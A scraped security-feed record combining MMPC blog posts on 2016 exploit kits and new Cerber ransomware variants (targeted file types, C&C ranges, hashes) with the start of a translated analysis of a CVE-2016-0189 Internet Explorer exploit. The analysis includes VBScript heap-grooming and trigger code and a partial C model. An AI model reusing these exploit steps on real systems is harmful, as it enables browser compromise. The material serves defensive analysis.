July 14, 2016 \nCVE-2016-1019 | Adobe Flash | Pangimop, NeutrinoEK | April 7, 2016 ([APSB16-10](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>)) | April 2, 2016 (zero-day) \nCVE-2016-4117 | Adobe Flash | NeutrinoEK | May 12, 2016 ([APSB16-15](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>)) | May 21, 2016 \n \nWe did not see exploit kits targeting Microsoft\u2019s newest and most secure browser, Microsoft Edge, in 2016. Only a few days into the new year, however, SundownEK was updated to include an exploit for an old vulnerability that was patched a couple of months prior. Microsoft Edge applies patches automatically by default, rendering the exploit ineffective.\n\nIt was also SundownEK that integrated steganography in late 2016. 
Steganography, a technique that is not new but getting more popular with cybercriminals, hides information like malicious code or encryption keys in images.\n\nInstead of loading the exploit directly from a landing page, SundownEK downloads an image that contains the exploit code. This method is employed to avoid detection.\n\n## Stopping exploit kits with updates and a secure platform\n\nWhile we see a willingness among cybercriminals to switch from exploit kits to spam and other vectors, there is a clear desire to continue using kits. We see cybercriminals switch from one kit to another, replacing kits as they become unavailable. Meanwhile, exploit kit authors continue to keep their wares attractive to cybercriminals by incorporating new exploits.\n\nKeeping browsers and other software up-to-date can counter the impact of exploit kits. [Microsoft Edge](<https://technet.microsoft.com/itpro/microsoft-edge/index>) is a secure browser that gets updated automatically by default. It also has multiple built-in [defenses](<https://microsoft.sharepoint.com/teams/osg_core_dcp/cpub/partner/antimalware/Shared Documents/8438038_RS2_Blogs/2016 in Review series/-%09https:/www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>) against exploit kits that attempt to download and install malware. These defenses include on-by-default sandboxing and state of the art exploit mitigation technologies. 
Additionally, [Microsoft SmartScreen](<https://blogs.windows.com/msedgedev/2015/12/16/smartscreen-drive-by-improvements/#3FYqD02TC1A6VsaL.97>), which is used in both Microsoft Edge and Internet Explorer 11, blocks malicious pages, such as landing pages used by exploit kits.\n\nAt the same time, running a secure platform like Windows 10 enables users to benefit from advanced security features.\n\n[Windows Defender](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) uses IExtensionValidation (IEV) in Microsoft Internet Explorer 11 to detect exploits used by exploit kits. Windows Defender can also detect the malware that exploit kits attempt to download and execute.\n\nWindows 10 Enterprise includes [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>), which can lock down devices and provide kernel-level virtualization-based security.\n\n[Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) alerts security operations teams about suspicious activities, including exploitation of vulnerabilities and the presence of malware, allowing them to detect, investigate, and respond to attacks.\n\n\n\n_MMPC_\n\n\n\n## Related blog entries:\n\n * [World Backup Day is as good as any to back up your data](<https://blogs.technet.microsoft.com/mmpc/2017/03/28/world-backup-day-is-as-good-as-any-to-back-up-your-data/>)\n * [Ransomware: a declining nuisance or an evolving menace?](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>)\n * [Averting ransomware epidemics in corporate networks with Windows Defender ATP](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 
"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-23T22:37:34", "title": "Exploit kits remain a cybercrime staple against outdated software \u2013 2016 threat landscape review series", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2017-01-23T22:37:34", "href": "https://blogs.technet.microsoft.com/mmpc/2017/01/23/exploit-kits-remain-a-cybercrime-staple-against-outdated-software-2016-threat-landscape-review-series/", "id": "MMPC:A8911A071FAE866BC15F59CA0B325D45", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-15T09:08:41", "description": "_(Note: Read our latest comprehensive report on ransomware: _[**_Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene_**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>)_.)_\n\n \n\nAs everybody else winds down for the holidays, the cybercriminals behind [Cerber](<https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Cerber>) are busy ramping up their 
operations.\n\nFollowing our discovery of a spam campaign that takes advantage of [holiday shopping](<https://blogs.technet.microsoft.com/mmpc/2016/12/13/been-shopping-lately-fake-credit-card-email-can-spook-you-into-downloading-cerber-ransomware/>), we found two new campaigns that continue distributing the latest variants of Cerber [ransomware](<https://blogs.technet.microsoft.com/mmpc/tag/ransomware/>). These campaigns are the latest in a series of persistent cybercriminal efforts that keep Cerber constantly active.\n\n\n\n_Figure 1. Cerber activity trending in the past three months_\n\nFirst, we detected a fresh spam campaign that delivers document files in password-protected .zip archives. The emails use simple subject lines like \u201cHowdy\u201d or \u201cHello\u201d, while the email body seem to keep the holiday shopping theme with messages like \u201cyour order should be delivered today\u201d and \u201cStatement is attached\u201d. The password to the archive, which is usually \u201c6666\u201d in this campaign, is in the email body.\n\n\n\n_Figure 2. Sample spam email from recent Donoff campaign that distributes a new version of Cerber_\n\nWhen extracted, the document files run malicious macro code detected by Windows Defender as [TrojanDownloader:O97M/Donoff](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDownloader:O97M/Donoff>). Donoff is a Trojan downloader that installs malware; in this campaign, it downloads and executes Cerber.\n\nOur tracking of Donoff activity shows a spike corresponding to the email campaign.\n\n\n\n_Figure 3. Donoff activity for the past 30 days_\n\nThe second campaign that we discovered distributing Cerber ransomware uses the RIG exploit kit, which Windows Defender detects as [Exploit:HTML/Meadgive](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Exploit:HTML/Meadgive.W>). 
When a user accesses a compromised page or an attacker-controlled website hosting the exploit kit, vulnerabilities like [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) are exploited, and Cerber is downloaded and executed on the computer.\n\nTelemetry from Windows Defender shows that this latest exploit kit attack that leads to Cerber largely affects Asia and Europe.\n\n\n\n_Figure 4. Geographic distribution of victims of recent RIG exploit kit distributing Cerber_\n\nThe two campaigns deliver variants of the new version of Cerber ransomware. These new iterations of the malware sport updated configuration and behavior, demonstrating that the cybercriminals behind them are not slowing down in evolving the malware.\n\nBelow are the notable updates seen in the latest version of Cerber:\n\n 1. As with the [holiday-themed campaign](<https://blogs.technet.microsoft.com/mmpc/2016/12/13/been-shopping-lately-fake-credit-card-email-can-spook-you-into-downloading-cerber-ransomware/>) from a few weeks ago, these new Cerber variants arrive with a wallpaper that is noticeably modified from previous versions\u2019 green palette to red: \n \n_Figure 5. New Cerber wallpaper, which changed its color palette _\n 2. Another level of obfuscation is used: UPX on the top of the Nullsoft installer and custom encryption used by older versions.\n 3. The configuration, which contains the most important data that determine the behavior of the ransomware, are encrypted using RC4 just like older versions, but using Crypto APIs instead of custom implementation.\n 4. Threat version information, which has been useful in tracking the evolution of Cerber, is nowhere to be found in the configuration.\n 5. 
More than 50 new file name extensions are added as targets for encryption; on the other hand, several file name extensions, including .exe, .cmd, and .msi, are exempted from the encryption routine; this latter behavior has been observed in other prominent ransomware families, but we\u2019re seeing it for the first time with Cerber.\n 6. Folders that are prioritized during encryption include new ones, like _microsoft\\onenote_, _microsoft\\outlook_, and _\\microsoft\\excel\\_, among others; however, folders that are exempted from the encryption routine now include \"$windows.~ws\", \"intel\", and \"windows10upgrade\", among others.\n 7. Shadow copies are no longer deleted.\n 8. Payment site provided is now a single Tor proxy site, compared to three proxy sites in older versions.\n 9. The cybercriminals added two new sets of IP ranges where command-and-control (C&C) servers reside.\n\nFor cybercriminals, releasing a new version of malware not only increases the likelihood of evading antivirus detection; it\u2019s also a way of increasing the complexity of malware. Cerber\u2019s long list of updated behavior indicates that the cybercriminals are highly motivated to continue improving the malware and the campaigns that deliver it.\n\nIt is important to note that one of the most critical updates in this latest version of Cerber is the new folders it prioritizes during encryption. The added folders, which include _microsoft\\onenote_, _microsoft\\outlook_, and _\\microsoft\\excel\\_ among others, are a further indication that the malware is designed to look for critical Microsoft Office files to encrypt in enterprise environments.\n\n## Stopping Cerber infection in Windows 10\n\nWindows 10 has security technologies that can detect this new batch of updated Cerber ransomware. 
Keep your computers up-to-date in order to get the benefits from the latest features and proactive mitigation built into the latest versions of Windows.\n\n[Windows Defender](<https://support.microsoft.com/en-us/help/17464/windows-defender-help-protect-computer?ocid=-2147269815>) detects the new version of Cerber ransomware as [Win32/Cerber](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Cerber>). It also detects files related to the two campaigns that deliver the ransomware: the malicious attachments used in the spam campaign as [TrojanDownloader:O97M/Donoff](<https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader%3AO97M%2FDonoff>), and the RIG exploit kit as [Exploit:HTML/Meadgive](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Exploit:HTML/Meadgive.W>).\n\n[Microsoft Edge](<https://blogs.windows.com/msedgedev/2015/12/16/smartscreen-drive-by-improvements/>) can help prevent exploit kits from running and executing ransomware on computers. 
[SmartScreen Filter](<https://blogs.windows.com/msedgedev/2015/12/16/smartscreen-drive-by-improvements/>) uses URL reputation to block access to malicious sites, such as those hosting exploit kits.\n\n[Office 365 Advanced Threat Protection](<https://blogs.office.com/2016/01/14/leading-the-way-in-the-fight-against-dangerous-email-threats/>) blocks malicious emails that spread malicious documents that could eventually install Cerber.\n\n[Device guard](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies>) protects systems from malicious applications like ransomware by maintaining a custom catalog of known good applications and stopping kernel-level malware with virtualization-based security.\n\nIT administrators can use [Group Policy in Office 2016](<https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/>) to block known malicious macros, such as the documents in password-protected email attachments used in this campaign, from running. They can also use [AppLocker group policy](<http://social.technet.microsoft.com/wiki/contents/articles/5211.how-to-configure-applocker-group-policy-to-prevent-software-from-running.aspx>) to prevent dubious software from running.\n\nIT administrators can also use [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) to get alerts when suspicious activities are observed in the network. 
Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection - Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## An in-depth look at the spam campaign\n\nBeyond providing protection, Microsoft Malware Protection Center (MMPC) monitors and analyzes Cerber and related campaigns in-depth in order to discern trends and gain deeper understanding of cybercriminal activity. This is how we were able to trace the evolution of Cerber and see the signs that it\u2019s not letting up.\n\nCerber has historically heavily used email as a primary infection vector. It is no different in this campaign.\n\n\n\n_Figure 6. Another sample spam email from recent Donoff campaign that distributes a new version of Cerber_\n\nThe attachment is usually a password-protected .zip archive that contains a macro malware in the form of a Microsoft Word document. When opened, the archive prompts for a password, which is indicated in the email body. This is a change from past campaigns, which password-protected the document, rather than the .zip file itself.\n\n\n\n_Figure 7. Attachment is a password-protected .zip archive_\n\nWhen extracted and executed, the document attempts to run its malicious macro code. Thus, Microsoft Office warns users about manually enabling macro, empowering users to block infection at this point. The document lures users to enable macro by faking a Microsoft Word message.\n\n\n\n_Figure 8. Malicious document lures users into enabling macro_\n\nThe macro code contains obfuscated downloading routines, as seen below.\n\n\n\n_Figure 9. Malware code showing obfuscated download link_\n\nThe macro code executes the following PowerShell command to attempt to download and execute Cerber in the _%AppData%_ folder:\n\n\n\n_Figure 10. 
Malware code showing PowerShell command_\n\n## An in-depth look at the new Cerber version\n\nThe latest version of Cerber protects the configuration data embedded in the malware binary using RC4. However, while older versions use custom codes to implement RC4, this new version uses Crypto APIs. The RC4 key is still embedded in the malware binary.\n\n\n\n_Figure 11. Code to pass RC4key and encrypted config data to the decryptor_\n\n\n\n_Figure 12. RC4 decryption using crypto APIs_\n\nCerber adds more than 50 file name extensions to its file encryption routine, bringing the total number of target file types to 493:\n\n.123 | .1cd | .3dm | .3ds | .3fr | .3g2 | .3gp | .3pr | .602 \n---|---|---|---|---|---|---|---|--- \n.7z | .7zip | .aac | .ab4 | .abd | .acc | .accdb | .accde | .accdr \n.accdt | .ach | .acr | .act | .adb | .adp | .ads | .aes | .agdl \n.ai | .aiff | .ait | .al | .aoi | .apj | .apk | .arc | .arw \n.ascx | .asf | .asm | .asp | .aspx | .asset | .asx | .atb | .avi \n.awg | .back | .backup | .backupdb | .bak | .bank | .bat | .bay | .bdb \n.bgt | .bik | .bin | .bkp | .blend | .bmp | .bpw | .brd | .bsa \n.bz2 | .c | .cash | .cdb | .cdf | .cdr | .cdr3 | .cdr4 | .cdr5 \n.cdr6 | .cdrw | .cdx | .ce1 | .ce2 | .cer | .cfg | .cfn | .cgm \n.cib | .class | .cls | .cmd | .cmt | .config | .contact | .cpi | .cpp \n.cr2 | .craw | .crt | .crw | .cry | .cs | .csh | .csl | .csr \n.css | .csv | .d3dbsp | .dac | .das | .dat | .db | .db3 | .db_journal \n.dbf | .dbx | .dc2 | .dch | .dcr | .dcs | .ddd | .ddoc | .ddrw \n.dds | .def | .der | .des | .design | .dgc | .dgn | .dif | .dip \n.dit | .djv | .djvu | .dng | .doc | .docb | .docm | .docx | .dot \n.dotm | .dotx | .drf | .drw | .dtd | .dwg | .dxb | .dxf | .dxg \n.edb | .eml | .eps | .erbsql | .erf | .exf | .fdb | .ffd | .fff \n.fh | .fhd | .fla | .flac | .flb | .flf | .flv | .forge | .fpx \n.frm | .fxg | .gbr | .gho | .gif | .gpg | .gray | .grey | .groups \n.gry | .gz | .h | .hbk | .hdd | .hpp | .html | .hwp | .ibank \n.ibd | 
.ibz | .idx | .iif | .iiq | .incpas | .indd | .info | .info_ \n.iwi | .jar | .java | .jnt | .jpe | .jpeg | .jpg | .js | .json \n.k2p | .kc2 | .kdbx | .kdc | .key | .kpdx | .kwm | .laccdb | .lay \n.lay6 | .lbf | .lck | .ldf | .lit | .litemod | .litesql | .lock | .ltx \n.lua | .m | .m2ts | .m3u | .m4a | .m4p | .m4u | .m4v | .ma \n.mab | .mapimail | .max | .mbx | .md | .mdb | .mdc | .mdf | .mef \n.mfw | .mid | .mkv | .mlb | .mml | .mmw | .mny | .money | .moneywell \n.mos | .mov | .mp3 | .mp4 | .mpeg | .mpg | .mrw | .ms11 | .msf \n.msg | .mts | .myd | .myi | .nd | .ndd | .ndf | .nef | .nk2 \n.nop | .nrw | .ns2 | .ns3 | .ns4 | .nsd | .nsf | .nsg | .nsh \n.nvram | .nwb | .nx2 | .nxl | .nyf | .oab | .obj | .odb | .odc \n.odf | .odg | .odm | .odp | .ods | .odt | .ogg | .oil | .omg \n.one | .onenotec2 | .orf | .ost | .otg | .oth | .otp | .ots | .ott \n.p12 | .p7b | .p7c | .pab | .pages | .paq | .pas | .pat | .pbf \n.pcd | .pct | .pdb | .pdd | .pdf | .pef | .pem | .pfx | .php \n.pif | .pl | .plc | .plus_muhd | .pm! 
| .pm | .pmi | .pmj | .pml \n.pmm | .pmo | .pmr | .pnc | .pnd | .png | .pnx | .pot | .potm \n.potx | .ppam | .pps | .ppsm | .ppsx | .ppt | .pptm | .pptx | .prf \n.private | .ps | .psafe3 | .psd | .pspimage | .pst | .ptx | .pub | .pwm \n.py | .qba | .qbb | .qbm | .qbr | .qbw | .qbx | .qby | .qcow \n.qcow2 | .qed | .qtb | .r3d | .raf | .rar | .rat | .raw | .rb \n.rdb | .re4 | .rm | .rtf | .rvt | .rw2 | .rwl | .rwz | .s3db \n.safe | .sas7bdat | .sav | .save | .say | .sch | .sd0 | .sda | .sdb \n.sdf | .secret | .sh | .sldm | .sldx | .slk | .slm | .sql | .sqlite \n.sqlite-shm | .sqlite-wal | .sqlite3 | .sqlitedb | .sr2 | .srb | .srf | .srs | .srt \n.srw | .st4 | .st5 | .st6 | .st7 | .st8 | .stc | .std | .sti \n.stl | .stm | .stw | .stx | .svg | .swf | .sxc | .sxd | .sxg \n.sxi | .sxm | .sxw | .tar | .tax | .tbb | .tbk | .tbn | .tex \n.tga | .tgz | .thm | .tif | .tiff | .tlg | .tlx | .txt | .uop \n.uot | .upk | .usr | .vb | .vbox | .vbs | .vdi | .vhd | .vhdx \n.vmdk | .vmsd | .vmx | .vmxf | .vob | .vpd | .vsd | .wab | .wad \n.wallet | .war | .wav | .wb2 | .wk1 | .wks | .wma | .wmf | .wmv \n.wpd | .wps | .x11 | .x3f | .xis | .xla | .xlam | .xlc | .xlk \n.xlm | .xlr | .xls | .xlsb | .xlsm | .xlsx | .xlt | .xltm | .xltx \n.xlw | .xml | .xps | .xxx | .ycbcra | .yuv | .zip | | \n \n \n\nHowever, new to this version is a list of file name extensions exempted from encryption:\n\n * .bat\n * .cmd\n * .com\n * .cpl\n * .dll\n * .exe\n * .hta\n * .msc\n * .msi\n * .msp\n * .pif\n * .scf\n * .scr\n * .sys\n\nIt adds new folders to a list that it prioritizes when searching for files to encrypt, indicating this new version is particularly going after Microsoft Office documents:\n\n * \\bitcoin\\ (new)\n * \\excel\\\n * \\microsoft sql server\\\n * \\microsoft\\excel\\ (new)\n * \\microsoft\\microsoft sql server\\\n * \\microsoft\\office\\ (new)\n * \\microsoft\\onenote\\ (new)\n * \\microsoft\\outlook\\ (new)\n * \\microsoft\\powerpoint\\ (new)\n * \\microsoft\\word\\ (new)\n * 
\\office\\ (new)\n * \\onenote\\\n * \\outlook\\\n * \\powerpoint\\\n * \\steam\\\n * \\the bat!\\\n * \\thunderbird\\\n * \\word\\ (new)\n\nBut it adds a few more folders to its list of exemptions:\n\n * \\$getcurrent\\ (new)\n * \\$recycle.bin\\ (new)\n * \\$windows.~bt\\\n * \\$windows.~ws\\ (new)\n * \\boot\\\n * \\documents and settings\\all users\\\n * \\documents and settings\\default user\\\n * \\documents and settings\\localservice\\\n * \\documents and settings\\networkservice\\\n * \\intel\\ (new)\n * \\msocache\\ (new)\n * \\perflogs\\ (new)\n * \\program files (x86)\\\n * \\program files\\\n * \\programdata\\\n * \\recovery\\ (new)\n * \\recycled\\ (new)\n * \\recycler\\ (new)\n * \\system volume information\\ (new)\n * \\temp\\ (new)\n * \\users\\all users\\\n * \\windows.old\\\n * \\windows10upgrade\\ (new)\n * \\windows\\\n * \\winnt\\ (new)\n * \\appdata\\local\\\n * \\appdata\\locallow\\\n * \\appdata\\roaming\\ (made more generic)\n * \\local settings\\\n * \\public\\music\\sample music\\\n * \\public\\pictures\\sample pictures\\\n * \\public\\videos\\sample videos\\\n * \\tor browser\\\n\nIt drops the ransom note, which contains instruction for decryption, as __README_{RAND}_.hta_; for example, __README_2Rg927_.hta._\n\n\n\n_Figure 13. 
Ransom note_\n\nAs of this writing, Cerber uses two new sets of IP ranges where C&C server could reside:\n\n * 17.1.32.0/27 (new)\n * 78.15.15.0/27 (new)\n * 194.165.16.0/22\n| \n\n * 37.15.20.0/27 (new)\n * 77.1.12.0/27 (new)\n * 91.239.24.0/23 (new) \n---|--- \n \n## Indicators of compromise\n\nThe following files were used for this analysis:\n\nMalicious .zip attachment:\n\n * 7be5e805c5bcb57fcfc3a9ab37292603d73086c4\n\nExtracted document with macro code:\n\n * 6a9e8990add357af0621dcd04600e5fcc9ebac23\n\nCerber variants downloaded by macro malware from _hxxps:// hl3gj7zkxjvo6cra.onion.to/svchost.exe_:\n\n * 4f02e747bc68262c2cf24dffaf792d51a57b02bd\n * 60c4c6e3f6d196278c0fd111aec0faafb003c4a0\n * 99f49b70685803e019734c457b1c77e9c7de5531\n * 55f72229d0552daf28744c97c88585b585fa159b\n * 8994e43317df691ad9796c95700a827ca613bdca\n * 7b318f8a59dc2a6ecd261ffd9b6ab27287a811d6\n * e049242200300dbce7aaf80c2235b94d0cea582a\n * ab0e408c2fc40996c8b9c3ab6e3aa1f88d22b656\n * 9d5ae07111c8c89d4fa92160c00f669f8eb15ddd\n * c46a426459c170c886e9f49b0c07cd3f1cc61ff2\n * 3fc3b16b915a17cb1c2c8e853c3f0a0c11c3715b\n * 3352c25b4dc695a344d4ca34c3efdc1e95a7b0ce\n * 5a7116673ab853505e2861240bf3a3d6cfccfc27\n * 5c09449b2413c41cf8f1ec64698d9bc4571ed744\n * 350ee3cee88cb1bb11cddc5c7e55eccadd3dc8fe\n * 67c948556bc2fabfcdc4e4dbcf2bf14cdbe73d51\n * f39b72e853ed743b8a9a2946d79f4fa1c91bfd5e\n\nCerber variants installed by RIG (aka Meadgive) exploit kit:\n\n * 9952b68f6d7965f9775946ba6d78638efa00d5e4\n * 75dcf470ef61b63f76865df9c1ed8edcf1c3f6d9\n\n## \n\n_Rodel Finones and Francis Tan Seng_\n\n_MMPC_\n\n \n\n## Related blog entries\n\n * [WannaCrypt ransomware worm targets out-of-date systems](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>)\n * [World Backup Day is as good as any to back up your data](<https://blogs.technet.microsoft.com/mmpc/2017/03/28/world-backup-day-is-as-good-as-any-to-back-up-your-data/>)\n * [Ransomware: a 
declining nuisance or an evolving menace?](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>)\n * [Averting ransomware epidemics in corporate networks with Windows Defender ATP](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>)", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-22T04:06:47", "title": "No slowdown in Cerber ransomware activity as 2016 draws to a close", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8651"], "modified": "2016-12-22T04:06:47", "href": "https://blogs.technet.microsoft.com/mmpc/2016/12/21/no-slowdown-in-cerber-ransomware-activity-as-2016-draws-to-a-close/", "id": "MMPC:0CBDFDEA590166A1E24CF4941C0CD670", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:15", "description": "At the end of October last year I obtained a CVE-2016-0189 exploit sample that is not quite the same as the publicly known ones. After a preliminary analysis I believe it is the original attack file from the year CVE-2016-0189 was first used. Its obfuscation is identical to that of the later CVE-2017-0149, CVE-2018-8174 and CVE-2018-8373 samples, and its technique for loading and running shellcode is likewise the same as in those later exploits. \nI was busy with other things at the time and did not study the sample carefully. A few days ago I dug the relevant samples out again and spent a good deal of time debugging them. \nIn this article I describe how this CVE-2016-0189 sample achieves exploitation; as the reader will see, the misalignment technique used during exploitation is almost the same as the one used for CVE-2014-6332, CVE-2017-0149, CVE-2018-8174 and CVE-2018-8373. \nThe CVE-2016-0189 samples seen publicly before this are essentially based on the code published in an earlier public write-up; I analysed the details of that public code in earlier articles. \nBelow we take a look at the technique used by the actual CVE-2016-0189 0-day sample from three years ago. \n\nMemory layout \nThe sample enters the exploit function by means of the following code: \ndocument.write(\" var obj = {}; obj.toString = function() { my_valueof(); return 0;}; StartExploit(obj); \" & Unescape(\"%3c/script%3e\")) \nIn the StartExploit function, the prepare function is called first to lay out memory. Every execution of arr2(i) = Null causes the memory of one tagSAFEARRAY structure to be freed. \nReDim arr(0, 0) \narr(0, 0) = 3 ' important step: after the misalignment the number 3 is read as the VARTYPE vbLong \n... \nSub prepare \nDim arr5() \nReDim arr5(2) \nFor i = 0 To 17 \narr3(i) = arr5 \nNext \nFor i = 0 To &h7000 \narr1(i) = arr \nNext \nFor i = 0 To 1999 \narr2(i) = arr ' initialise every member of arr2 to the array arr \nNext \nFor i = 1000 To 100 Step -3 \narr2(i)(0, 0) = 0 \narr2(i) = Null ' free one third of the elements between arr2(100) and arr2(1000) \nNext \nReDim arr4(0, &hFFF) ' define arr4 \nEnd Sub \nFunction StartExploit(js_obj) \n' unrelated code omitted \nprepare \narr4(js_obj, 6) = &h55555555 ' triggers the callback and the out-of-bounds write \nFor i = 0 To 1999 ' look for the arr2 element whose upper bound is no longer 0 \nIf IsArray(arr2(i)) = True Then \nIf UBound(arr2(i), 1) > 0 Then \nvul_index = i \nExit For \nEnd If \nEnd If \nNext \nlb_index = LBound(arr2(i), 1) \nIf prepare_rw_mem() = True Then \nElse \nExit Function \nEnd If \naddr = leak_addr() \n' subsequent code omitted \nEnd Function \nEach tagSAFEARRAY occupies 0x30 bytes of heap memory, of which the last 0x20 bytes hold the actual tagSAFEARRAY data. \n0:015> !heap -p -a 052a9fb0 \naddress 052a9fb0 found in \n_HEAP @ 360000 \nHEAP_ENTRY Size Prev Flags UserPtr UserSize - state \n052a9f98 0007 0000 [00] 052a9fa0 00030 - (busy) \n0:015> dd 052a9fa0 l30/4 \n052a9fa0 00000000 00000000 00000000 0000000c \n052a9fb0 08800002 00000010 00000000 0529d640 \n052a9fc0 00000001 00000000 00000001 00000000 \n0:015> dt ole32!tagSAFEARRAY 052a9fb0 \n+0x000 cDims : 2 \n+0x002 fFeatures : 0x880 \n+0x004 cbElements : 0x10 \n+0x008 cLocks : 0 \n+0x00c pvData : 0x0529d640 \n+0x010 rgsabound : [1] tagSAFEARRAYBOUND \nThe whole freeing process leaves roughly 300 holes of 0x30 bytes in the heap. \n\nTriggering the vulnerability \nOnce the memory layout is complete, the exploit code executes arr4(js_obj, 6) = &h55555555. This operation enters the custom my_valueof callback, and inside the callback arr4 is redefined. As a result the original pvData memory of arr4 is freed and new memory of the required size is allocated. 
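The SAFEARRAY arithmetic behind this is easier to follow in code. The C program below is an added illustration, not code from this article or from the sample: it models the 32-bit tagSAFEARRAY layout from the windbg dump above (field offsets taken from the dt output), computes element offsets the way the leftmost-index-fastest layout requires, and shows why the element address computed for arr4(0, 6) under the original bounds arr4(0, &hFFF) lies outside the 0x30-byte buffer that ReDim arr4(2, 0) allocates. The same arithmetic yields the 0x50 offset of A(1,2) that the Nebula EK analysis further down this page works out with windbg. The structure and function names (SafeArray32, make_2d, element_offset, stale_write_escapes, offset_2d, arr4_write_escapes, from_dump) are mine; that AccessArray applies the offset computed under the pre-callback bounds to the post-callback buffer is my reading of the description above, and the engine-level details are in the continuation of the article.

```c
/* Added illustration, not code from the article: models the 32-bit tagSAFEARRAY
 * layout from the windbg dump above and the element-offset arithmetic that
 * vbscript!AccessArray performs. Field offsets follow the dt ole32!tagSAFEARRAY
 * output (0x0 cDims, 0x2 fFeatures, 0x4 cbElements, 0x8 cLocks, 0xC pvData,
 * 0x10 rgsabound); the VBScript array sizes are the ones used by the sample. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    uint32_t cElements;  /* element count of this dimension */
    int32_t  lLbound;    /* lower bound of this dimension */
} SafeArrayBound;

typedef struct {               /* the 0x20 data bytes of a 2-D tagSAFEARRAY (32-bit) */
    uint16_t cDims;
    uint16_t fFeatures;
    uint32_t cbElements;
    uint32_t cLocks;
    uint32_t pvData;             /* 32-bit pointer kept as an integer */
    SafeArrayBound rgsabound[2]; /* rgsabound[0] describes the RIGHTMOST dimension */
} SafeArray32;

_Static_assert(offsetof(SafeArray32, pvData) == 0xC, "pvData offset");
_Static_assert(offsetof(SafeArray32, rgsabound) == 0x10, "rgsabound offset");
_Static_assert(sizeof(SafeArray32) == 0x20, "descriptor size");

/* Build a VBScript array declared as ReDim a(0 To n_left-1, 0 To n_right-1). */
static void make_2d(SafeArray32 *sa, uint32_t n_left, uint32_t n_right, uint32_t pvData)
{
    memset(sa, 0, sizeof *sa);
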